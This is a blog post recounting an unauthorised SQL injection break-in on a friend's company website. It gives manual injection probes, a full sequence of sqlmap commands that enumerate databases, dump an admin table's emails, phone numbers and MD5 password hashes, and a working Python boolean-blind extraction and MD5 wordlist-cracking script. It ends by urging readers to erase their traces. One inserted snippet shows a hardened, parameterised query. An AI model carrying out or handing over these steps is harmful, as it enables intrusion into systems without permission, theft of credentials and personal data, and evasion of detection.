SQL injection: how I broke into an internet company step by step
I have recently been studying web security, especially the various classes of SQL injection, and have gotten to know some of the tools associated with it. Idle and bored at home over the weekend, I wanted to take what I had learned and try it against the company of a friend of mine, to see whether it would succeed. I would not have known without trying, and it really did succeed. I was a little excited, so I am writing this blog post to record how I broke into this internet company step by step.
"Tools used"
(1) AppScan penetration scanning tool
AppScan is one of the most widely used tools in the web application penetration testing stage. It is a desktop application that helps professional security personnel perform automated vulnerability assessments of web applications.
(2) sqlmap penetration testing tool
sqlmap is an open-source automated SQL injection tool whose primary function is to scan for, discover, and exploit SQL injection vulnerabilities in a given URL.
"Details of the attack"
First, scan the company's website www.xxx.com with AppScan. The scan results are as follows:
Among the 56 security issues reported, pick out a link that looks interesting, for example this one:
http://www.xxx.com/system/cms/show?id=1
Why pick this one? Because a numeric id parameter in the query string is the typical SQL injection pattern, so the common manual SQL injection technique applies. First send the following requests to determine whether the site has an injection point (shown here against a generic example host):
http://192.168.16.128/news.php?id=1              original page
http://192.168.16.128/news.php?id=1'             error or abnormal page
http://192.168.16.128/news.php?id=1 and 1=1      page displays normally
http://192.168.16.128/news.php?id=1 and 1=2      error or abnormal page (content missing)
If the single quote produces an error, `and 1=1` returns the normal page and `and 1=2` returns a different page, the parameter is being concatenated into the SQL query unchanged, and an injection point very likely exists.
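The four probes above work because the id value is spliced into the SQL text as-is. The following added example (not from the original post) reproduces that behaviour in-process with Python's sqlite3 module on a constructed `news` table, and places the vulnerable handler beside a hardened one that validates and binds the parameter. The table and column names are assumptions; the real site's schema is unknown.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the site's database (assumption: the real
    table and column names are unknown; 'news' and 'title' are made up)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(1, "Welcome"), (2, "Second post")])
    return conn


def show_vulnerable(conn, id_param):
    """The pattern behind news.php?id=...: the raw query-string value is
    concatenated into the SQL text, so SQL inside the value is executed."""
    sql = "SELECT title FROM news WHERE id = " + id_param
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))          # the "error or abnormal page" case
    return ("ok", row[0] if row else None)  # None: the page renders empty


def show_safe(conn, id_param):
    """Hardened form: reject anything that is not an integer, then bind the
    value as a parameter so it can never change the query's structure."""
    try:
        id_value = int(id_param)
    except ValueError:
        return ("rejected", None)
    row = conn.execute("SELECT title FROM news WHERE id = ?",
                       (id_value,)).fetchone()
    return ("ok", row[0] if row else None)


# The four probes from the text, in order.
PROBES = ["1", "1'", "1 and 1=1", "1 and 1=2"]


def probe(conn, handler):
    """Send each probe to a handler and collect what the page would show."""
    return {p: handler(conn, p) for p in PROBES}


if __name__ == "__main__":
    conn = make_db()
    for name, handler in (("vulnerable", show_vulnerable), ("safe", show_safe)):
        print(name)
        for p, outcome in probe(conn, handler).items():
            print(f"  id={p!r:14} -> {outcome}")
```

With the vulnerable handler the three injected probes give error / "Welcome" / empty, exactly the signature described above; the hardened handler shows "Welcome" for `1` and rejects the other three, so the probes no longer reveal anything about the query.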
After confirming that http://www.xxx.com/system/cms/show?id=1 has an injection point, start the penetration testing tool sqlmap for the actual injection work. The detailed process is as follows:
1) Re-confirm that the target injection point is usable:
python sqlmap.py -u "http://www.xxx.com/system/cms/show?id=1"
Parameters:
-u: the URL containing the injection point
Results:
The injection results show:
A. The parameter id is vulnerable to boolean-based blind injection: whether the injected condition is true or false can be read off whether the returned page matches the original.
B. The parameter id is vulnerable to time-based blind injection: nothing can be inferred from the page content itself, so a time delay is attached to the condition and its truth value is read off whether the response is delayed (that is, whether the page takes longer to come back).
C. The back-end database is MySQL 5.0.12.
2) Enumerate all databases:
A single command lists every database name on the server:
python sqlmap.py -u "http://www.xxx.com/system/cms/show?id=1" --dbs
Parameters:
--dbs (two dashes): enumerate all databases.
Results:
The results show that the server contains 3 databases accessible to the current user.
3) Get the database currently in use:
python sqlmap.py -u "http://www.xxx.com/system/cms/show?id=1" --current-db
Parameters:
--current-db: the database the application is currently using.
Results:
4) Get the database account the application is currently using:
python sqlmap.py -u "http://www.xxx.com/system/cms/show?id=1" --current-user
5) List all users of the database server:
python sqlmap.py -u "http://www.xxx.com/system/cms/show?id=1" --users
6) Get the database users' password hashes:
python sqlmap.py -u "http://www.xxx.com/system/cms/show?id=1" --passwords
The result shows that the current database user apparently lacks permission to read the system table that stores the account passwords, so nothing is returned.
7) List the tables in the database:
python sqlmap.py -u "http://www.xxx.com/system/cms/show?id=1" -D xxx_store --tables
Parameters:
-D: the database name
--tables: list the tables in that database
Results:
The results show a total of 69 tables.
8) List the columns in a table:
python sqlmap.py -u "http://www.xxx.com/system/cms/show?id=1" -D xxx_store -T mall_admin --columns
Parameters:
-D: the database name
-T: the table whose columns should be listed
--columns: list the columns
Results:
9) Dump column contents:
python sqlmap.py -u "http://www.xxx.com/system/cms/show?id=1" -D xxx_store -T mall_admin -C "ag_id,email,id,mobile,name,password,status" --dump
Parameters:
-C: the columns to dump
--dump: retrieve the contents and save them
If the table holds a lot of data, a full dump over a blind injection point takes a long time, since every character costs several requests. You can restrict the dump to a range of rows with the following command:
python sqlmap.py -u "http://www.xxx.com/system/cms/show?id=1" -D xxx_store -T mall_admin -C "ag_id,email,id,mobile,name,password,status" --start 1 --stop 10 --dump
Parameters:
--start: the first row to retrieve
--stop: the last row to retrieve
This command exports rows 1 through 10 of the columns ag_id, email, id, mobile, name, password and status from the table mall_admin in the database xxx_store.
The results are as follows:
From the dump we can see the user records in the admin table. The password column holds MD5 hashes. MD5 cannot be decrypted; the hash is looked up in a precomputed table or cracked against a wordlist, which for a weak password yields the original. With the user name and that password, we can log in to the site's back end.
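Steps 1) to 9) hand the work to sqlmap; what it actually does behind `--dump` on a boolean-based blind injection point, and what "cracking" the MD5 afterwards means, is worth seeing once. The following added example (not part of the original post, and not sqlmap's code) simulates the target with an in-memory SQLite database, defines the oracle the attacker observes (does the page show a news item or not), recovers the admin password hash from a constructed `mall_admin` row one character at a time by binary search, and then matches the recovered hash against a wordlist. The table and column names come from the text; the row contents, the wordlist and the SQLite probe syntax (`unicode(substr(...))`, where MySQL would use `ascii(substring(...))`) are assumptions.

```python
import hashlib
import sqlite3


def make_target():
    """Constructed stand-in for the target database (assumption: the real
    rows are unknown; the admin row and its MD5 hash are made up here)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO news VALUES (1, 'Welcome')")
    conn.execute("CREATE TABLE mall_admin (id INTEGER, name TEXT, password TEXT)")
    conn.execute("INSERT INTO mall_admin VALUES (1, 'admin', "
                 "'e10adc3949ba59abbe56e057f20f883e')")
    return conn


class Oracle:
    """Models show?id=<param>: the raw parameter is concatenated into the
    query, and the attacker only learns whether a news item was shown."""

    def __init__(self, conn):
        self.conn = conn
        self.requests = 0

    def page_shows_content(self, id_param):
        self.requests += 1
        sql = "SELECT title FROM news WHERE id = " + id_param
        try:
            row = self.conn.execute(sql).fetchone()
        except sqlite3.OperationalError:
            return False  # error page counts as "false"
        return row is not None


def blind_extract(oracle, expr, max_len=64):
    """Recover the string value of the SQL expression `expr` one character
    at a time. Each character code is found by binary search over 0..127,
    so it costs 7 requests; substr() past the end of the string yields '',
    unicode('') is NULL, every comparison is then false and the loop ends.
    SQLite syntax; on MySQL the probe would use ascii(substring(...))."""
    value = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = f"1 and unicode(substr(({expr}),{pos},1)) > {mid}"
            if oracle.page_shows_content(probe):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        value += chr(lo)
    return value


def extract_admin_hash(conn):
    """What `-T mall_admin -C password --dump` amounts to for a single row.
    Returns the recovered value and the number of requests it took."""
    oracle = Oracle(conn)
    hash_value = blind_extract(
        oracle, "SELECT password FROM mall_admin WHERE name = 'admin'")
    return hash_value, oracle.requests


def crack_md5(hash_hex, wordlist):
    """MD5 is not reversible: hash each candidate (constructed wordlist)
    and return the first one whose digest matches, or None."""
    for candidate in wordlist:
        if hashlib.md5(candidate.encode()).hexdigest() == hash_hex:
            return candidate
    return None


if __name__ == "__main__":
    conn = make_target()
    recovered, n = extract_admin_hash(conn)
    print(f"recovered {recovered} in {n} requests")
    print("cracked:", crack_md5(recovered, ["password", "admin", "123456"]))
```

A 32-character hash costs 7 requests per character plus one more round to detect the end of the string, 231 requests in total, which is why the text's advice to limit `--dump` with `--start`/`--stop` matters on a blind injection point. Time-based blind extraction works the same way, except that each answer is read from a delay instead of the page content.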
So far we have successfully broken into the company's back end and obtained the relevant data. A reminder: a successful intrusion is only half the job; the more important half is cleaning up your traces so that nobody discovers you.